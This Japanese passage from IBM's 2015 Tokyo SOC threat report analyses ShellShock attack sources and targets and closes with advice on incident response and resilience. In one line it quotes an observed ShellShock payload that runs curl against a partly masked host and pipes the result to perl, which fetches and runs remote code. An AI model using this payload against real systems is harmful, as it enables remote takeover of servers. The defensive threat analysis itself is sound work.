発に攻撃が行われている状況です。ShellShock
については特定の NAS 製品を狙ったワームとは
別の種類のワームと考えられるものが登場して
きており、今後も定常的に攻撃が行われる状況が
しばらく続くものと考えられます。
SQL インジェクションについては、今期の特徴
として、特定の期間中、中国の IP アドレスから
主に国内の金融機関を対象に集中的に調査行為
が行われていたことが挙げられます。
新規にシステムをインターネットに公開す
る際や、既存のシステムの更新や更改時には
セキュリティー診断などの脆弱性チェックを
行うと共に、セキュリティー侵害が発生した
場合の対応手順と体制を整えておく必要があ
ります。
41
2015 年上半期 Tokyo SOC 情報分析レポート
[Column3] 攻撃元 IP アドレスからみる ShellShock 脆弱性を利
用した攻撃の分析
インターネットでの通信では必ず送信元と宛先の識別子（IP アドレス）が指定される必要があり、これ
は攻撃に用いられる不正な通信でも同様です。実際には攻撃者は IP アドレスを変更しながら攻撃したり、
攻撃者とは関係のないホストを経由して攻撃する可能性もあるため、この IP アドレスが必ずしも攻撃者を
示すとは限りませんが、攻撃元を識別するための重要な要素となります。この攻撃元 IP アドレスの長期的
な動向を調べることによって、攻撃者がどのような戦略をとっているのかを伺い知ることができます。こ
のコラムでは攻撃者に利用される IP アドレスについて調査してみました。
図 33. bash_cve_2014_6271_rce を含む攻撃の攻撃元 IP アドレスと攻撃対象の関係図
(IBM SOC 調べ：2014 年 9 月 26 日∼2015 年 6 月 30 日、検知総数 3,490,658 件)
42
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向の解説で ShellShock 脆弱性を利用した攻撃がいくつかの特徴的な文字
列によって分類できることを示しました。この分類は攻撃の発生時期や利用されるツールを知る上でひと
つの手がかりとなっていましたが、攻撃の挙動についても違いが現れています。
◆
攻撃元 IP アドレスと攻撃先組織は攻撃者の意図によって分散するか？
図 33 は ShellShock 脆弱性を利用した攻撃のうち、`bash_cve_2014_6271_rce` という文字列を含む
イベントの攻撃元 IP アドレスと攻撃先の組織の IP アドレスを集約したものの関係を示しています。赤い
ノードは攻撃元 IP アドレス、青いノードは攻撃先の組織を表しており、それぞれを線で結んでいます。攻
撃観測数が多いほどノードが大きく描かれています。
図 34. |perl を含む攻撃の攻撃元 IP アドレスと攻撃対象の関係図
(IBM SOC 調べ：2014 年 9 月 26 日∼2015 年 6 月 30 日、検知総数 1,295,326 件)
43
2015 年上半期 Tokyo SOC 情報分析レポート
`bash_cve_2014_6271_rce` という文字列は脆弱性検査ツールのプラグインに含まれるものだと考え
られます。攻撃元 IP アドレスと攻撃先組織の関係を見ると IP アドレスの数は少ないことが分かります。
このことは、脆弱性診断のような正当な通信の場合は、IP アドレスは比較的分散せず、図のように集約さ
れた形となることが見てとれます。
それでは、実際の攻撃通信を同じ手法で図示した場合はどうなるでしょうか。図 34、図 35 は ShellShock
脆弱性を利用した攻撃を示したものです。
図 34 は`|perl` を含んでいた攻撃です。図 33 の脆弱性診断の通信などとは異なり、多数の攻撃元 IP ア
ドレスが多くの攻撃対象にまたがって攻撃を実施していることがわかります。このように無差別に攻撃し
ていると考えられる場合、`bash_cve_2014_6271_rce` で示した図とは大きく異なり、混沌とした状態
になっています。
図 35 は `|perl`の中でもさらに同一の攻撃コードによる攻撃を可視化したものです。前述したすべての
`|perl`と比較すると攻撃元 IP アドレスおよび攻撃先組織の数は少ないものの、煩雑な状態になっている
ことは変わりません。これらすべての通信には
`()
{
:;
};
curl
http://202.*.*.*/lib21/index.cgi | perl` というコードが含まれており、同一の攻撃ツールが
使われていたことが推測されます。しかし、複数の攻撃元 IP アドレスから同一の組織に対して攻撃が実施
されており、攻撃側が効率的に攻撃対象を拡散できていない様子がみてとれます。さらに詳しく見ると同
じ攻撃元 IP アドレスから同じ宛先に対して複数回送信しているケースも見られました。
図 35. |perl を含む攻撃で特に同一のコードをもつ攻撃の攻撃元 IP アドレスと攻撃対象の関係図
(IBM SOC 調べ：2014 年 10 月 22 日∼2014 年 12 月 4 日、検知総数 722,182 件)
44
2015 年上半期 Tokyo SOC 情報分析レポート
たとえばワームの場合は攻撃者が攻撃をコントロールせずに自律的に拡散する動きを見せますが、この
攻撃でもそれと似たような動きをしていることが分かります。さらには個々の動きも攻撃の試行回数を低
減させるような工夫がなされていないことが伺えます。
◆
大規模攻撃から見る攻撃の予備調査とホストの乗っ取りを目的とした攻撃の相関の有無
公開サーバーに対する攻撃の章で解説したとおり、2015 年 4 月 8 日から 2 日間ほどの間で ShellShock
脆弱性を利用した大規模な攻撃が発生しています。2015 年 4 月 8 日午後 6 時 11 分から`s.php`および
`gate.php`を攻撃コード含む調査活動を目的とした攻撃が、また、2015 年 4 月 9 日午前 4 時 8 分から
`XSUCCESS`を攻撃コードに含むホストの乗っ取りを目的としたとみられる攻撃が大量に発生しています。
この 2 つは発生時刻が近いことから、なんらかの関係性があったのではないかと仮定しました。これらの
2 つの攻撃を前述と同じ手順で可視化したものが図 36 と図 37 になります。
図 36. s.php もしくは gate.php を含む攻撃の攻撃元 IP アドレスと攻撃対象の関係図
(IBM SOC 調べ：2015 年 4 月 8 日∼2015 年 4 月 16 日、検知総数 1,032,631 件)
45
2015 年上半期 Tokyo SOC 情報分析レポート
この 2 つは同じ時期に発生した同じ脆弱性を利用した攻撃ですが、攻撃の挙動としては対照的な事がわ
かります。調査行為を目的としている図 36. では無差別に攻撃対象を選択しておらず、計画的に攻撃対象
を選択し、効率良く調査している様が読み取れます。これは図で解説した `bash_cve_2014_6271_rce`
を含む攻撃と似たような傾向が見られますが、`bash_cve_2014_6271_rce` は長期的に発生していたも
のをまとめた結果であるのに対し、図 36. で示した関係図は約 9 日間で発生したイベントをもとにしてい
ます。このように悪意ある調査行為の場合、たとえ短期間であっても周到に準備をして効率的に攻撃を行
っていることが示唆されます。
一方、図 37. ではホスト上で任意のコマンドを実行してホストを乗っ取る攻撃について、攻撃元 IP アド
レスと攻撃先組織の関係を示しています。この攻撃はワームのように攻撃に成功したホストが、新たな攻
撃対象への攻撃を開始するものであったという報告があります。攻撃元 IP アドレスと攻撃先組織に重複が
多数見られることから、攻撃者は攻撃の成否を確認したり、攻撃の対象の管理をしたりせずに感染を拡大
する活動を無差別に行っていたと考えられます。
この 2 種類の攻撃元 IP アドレスを比較したところ、ほとんど IP アドレスの重複はなく、重複がある場合
でも直接的な攻撃者のつながりが見られるものはありませんでした。当初は調査行為がその後に続く乗っ
取りの攻撃とつながるものと仮定しましたが、IBM SOC で監視している範囲ではそのような相関は見られ
ませんでした。これは、IBM SOC で監視している範囲において調査活動によって脆弱性があると判断され
ず、結果としてその後の攻撃が行われなかったと考えられます。前述したとおりホストの乗っ取りを試み
る攻撃は無差別に攻撃されたものとみられるため、XSUCCESS として検知された攻撃は調査活動の結果
に基づく攻撃ではなかったことが分かります。ただし、このような調査行為と乗っ取り行為が同時期に発
生していることからはインターネット空間では何らかの相関関係がある可能性があります。
◆
まとめ
これらの分析の結果により、以下のことがわかりました。
·
同じ脆弱性を利用した攻撃でも、攻撃ツールや攻撃者の意図によって攻撃元ホストや攻撃対象
に大きな違いがある。
·
ワームのように攻撃成功によって乗っ取られたホストが新たな攻撃を仕掛けるような攻撃では、
攻撃対象や攻撃の成否が攻撃を計画・実行した人物によって把握されているわけではなく、無
差別な攻撃を続ける傾向が見られる。
·
調査活動のような攻撃対象のホストに影響を与えない攻撃では、無差別ではなく計画的に攻撃
が実施されていた。
·
観測時期の近さから攻撃者が攻撃対象に脆弱性有無の調査を実施してから実被害を与えるとい
う大規模な攻撃が存在していると考えられる。
これらの考察から無差別に攻撃対象が選ばれる攻撃に対する防御だけではなく、攻撃者による調査活動
を遮断・抑制することによってよりセキュリティーを高めていくことが重要だと考えます。
46
2015 年上半期 Tokyo SOC 情報分析レポート
図 37. XSUCCESS を含む一部の攻撃の攻撃元 IP アドレスと攻撃対象の関係図
(IBM SOC 調べ：2015 年 4 月 8 日∼2015 年 4 月 16 日、検知総数 306,644 件)
47
2015 年上半期 Tokyo SOC 情報分析レポート
4 おわりに
セキュリティーリスクや攻撃に対する堅牢性
（Robustness）については、多層防御の考え方に基づ
きつつ、コストと優先順位のバランスをうまく取る必
要があります。その際、技術的な対策に偏らず、人や
プロセスについてもリスクへの備えが十分であるかを
2015 年上半期は、昨年に引き続き多数の脆弱性が公
開されました。脆弱性公開直後に攻撃が集中する傾向
にも変わりはなく、Tokyo SOC でもアドバイザリー情
報の提供やセキュリティー機器での防御対応など、迅
速な対応を求められる場面が多くありました。また、
「自組織で検知している攻撃が他でも起きている
か？」、「攻撃元に明確な傾向があるか？」といったお
問い合わせも増えています。このようなことからお客
様側でも検知ログを定期的に見直して不審な動きにい
ち早く対応しようとしていることがわかります。
クライアントを狙った攻撃に目を向けると、様々な
組織の事件の報道で標的型攻撃が注目されましたが、
Tokyo SOC の検知データでは不特定多数を対象とし
た攻撃も依然として多いことがわかります。また、
2014 年下半期には減少したかと思われたドライブ・バ
イ・ダウンロード攻撃は、攻撃を受けている組織が前
期の 16.9%から 40.5%に増加しているため、引き続き
注意が必要です。
現在のような感染対応を前提とした状況下では、予
防や防御と同じくらい事後対応が重要となってきます。
当然のことですがリスクをゼロにすることはできませ
ん。そこで重視すべきは近年注目されているレジリエ
ンス（復元力；Resilience）という考え方です。
ここではセキュリティー対策をセキュリティーリス
クや攻撃に対する堅牢性（Robustness）、インシデン
ト発生時の対応力（Response）、そして問題を解決し
て事業を継続していくレジリエンス（Resilience）の 3
つの面から考えてみます。
検証することが不可欠です。
インシデント発生時の対応力（Response）を高める
ためには、まずインシデント・レスポンスに関わる組
織を整理・構築する必要があります。CSIRT、SOC、
緊急対応（Emergency Response）チームなど、それ
ぞれ役割や必要とする人員の技術スキルは異なります。
昨今は企業内 CSIRT の取り組みが進んでいますが、
24 時間体制で監視を担う SOC や、フォレンジック調
査も要求される緊急対応チームなどと CSIRT 組織の
活動を分け、CSIRT をインシデント・レスポンスの中
心に位置づけて組織内部を統制する管理機能と外部組
織と連携する情報のハブとしての機能に集中させるこ
とから始めます。その上で、組織内 SOC や外部のソ
リューションとの連携を検討して最適なリソース配置
を決定していくべきであると考えます。
このように堅牢性（ Robustness ）と対応力
（Response）に具体的な施策を講じることで、サイバ
ーセキュリティーのレジリエンス（Resilience）が強
固なものとなっていきます。大切なことは、この３つ
の「R」を単なる IT 部門の課題として捉えるのではな
く、経営の問題として取り組む発想だと考えます。組
織のトップがレジリエンス向上を戦略として掲げ、必
要な資源を適切に割り当てることがサイバーセキュリ
ティー対策には不可欠であると言えるでしょう。
IBM は、
セキュリティー対策状況のアセスメントや、
セキュリティー機器の運用・監視、さらにはインシデ
ント発生時の駆けつけ対応である ERS（Emergency
Response Service）など、あらゆる領域で企業環境の
セキュリティー対策を広くサポートいたします。
【注意】本レポートで紹介した対策は、利用環境によって他のシステムへ影響を及ぼす恐れがあります。また、攻撃は日々変化
しており、必要となる対策もそれに応じて変化するため、記載内容の対策が将来にわたって効果があるとは限りません。対策を
行う際には十分注意の上、自己責任で行ってください。なお、IBM はこれらの対策の効果を保証するものではありません。
48
2015 年上半期 Tokyo SOC 情報分析レポート
執筆者
鳥谷部彰則
（エグゼクティブ・サマリー、おわりに）
菊地大輔
（1 章、コラム 1, 2）
窪田豪史
（2 章）
岡邦彦
（2 章）
猪股秀樹
（3 章）
水谷正慶
（3 章、コラム 3）
協力
井上博文、鈴木貴、奥村亮、柳優
IBM Security Operation Center (SOC)
Wrocław
Toronto
Tokyo
Boulder
Atlanta
Heredia
Brussels
Bangalore
Hortolândia
Brisbane
2015 年 9 月 4 日発行
日本アイ・ビー・エム株式会社
マネージド・セキュリティー・サービス
©Copyright IBM Japan, Ltd. 2015
IBM、IBM ロゴ、ibm.com、Ahead of the Threat は、世界の多くの国で登録された International Business Machines Corporation の商標です。他
の製品名およびサービス名等は、それぞれ IBM または各社の商標である場合があります。現時点での IBM の商標リストについては、
www.ibm.com/legal/copytrade.shtml をご覧ください。
Microsoft および Windows は Microsoft Corporation の米国およびその他の国における商標です。
Java およびすべての Java 関連の商標およびロゴは Oracle やその関連会社の米国およびその他の国における商標または登録商標です。
その他、本レポートに記載されている商品・サービス名は、各社の商標または登録商標です。
【注意】
●本レポートの情報は 2015 年 9 月 4 日時点のものです。内容は事前の予告なしに変更する場合があります。
●本レポートで紹介した対策は、利用環境によって他のシステムへ影響を及ぼす恐れがあります。また、攻撃は日々変化して
おり、必要となる対策もそれに応じて変化するため、記載内容の対策が将来にわたって効果があるとは限りません。対策を
行う際には十分注意の上、自己責任で行ってください。なお、IBM はこれらの対策の効果を保証するものではありません。
49
2015 年上半期 Tokyo SOC 情報分析レポート

Download Report